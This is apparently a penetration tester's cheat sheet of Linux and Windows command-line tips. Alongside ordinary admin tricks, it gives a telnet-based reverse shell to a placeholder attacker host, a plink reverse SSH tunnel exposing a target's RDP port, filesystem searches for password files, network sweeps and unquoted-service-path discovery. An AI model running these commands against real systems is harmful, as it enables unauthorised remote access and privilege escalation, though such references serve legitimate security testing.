- LINUX
- Grepping multiple strings: egrep -i "string1|string2" - e.g. nmap -sV -p21 10.0.0.* --open |egrep -i "report|open"
- Creating ip lists: for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
- Switching to previous directory: cd -
- Switching to home directory: cd
- Creating shortcut commands: alias netstat='netstat -antp' or even make up your own commands: i.e. alias makeips='for i in `seq 1 255`;do echo 192.168.1.$i;done'
- Viewing installed software:
- Debian based: dpkg --get-selections
- RPM based distributions (RHEL, Fedora Core, Cent OS, Suse Linux etc): rpm -qa
- Searching for Information:
- find / -name passw*- Search for filenames starting with passw
- find / | xargs passw - Search for files that contain passw in them.
- man -k <search_string> (e.g man -k ftp) - will list all man pages that refer to ftp.
- Reverse netcat shell without netcat:
- Attacker: nc -lvp 1234
- Target: mknod backpipe p && telnet <ATTACKERIP> 1234 0<backpipe | /bin/bash 1>backpipe
- Reverse SSH tunnel:
- setup ssh: service ssh start && sshd-generate
- upload plink to target:
- create reverse tunnel: plink.exe -l root -pw <your ssh pass> -R 3389:127.0.0.1:3389 <attackerIP> (will map targets rdp port to yours)
- rdp into yourself to access target: rdesktop 127.0.0.1 -f
- Finding open egress ports: nmap open.zorinaq.com
- Open all HTTP hosts on network in firefox: for i in $(nmap -p80 -n 192.168.0.* --open |grep report |cut -d" " -f5);do firefox -new-tab $i;done (have firefox open before running)
- Simple Web Server: python -m SimpleHTTPServer
- copying files via scp: scp *.txt <targetip>:
- WINDOWS
- quick ping sweep: for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i |findstr TTL
- Finding unquoted service paths:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
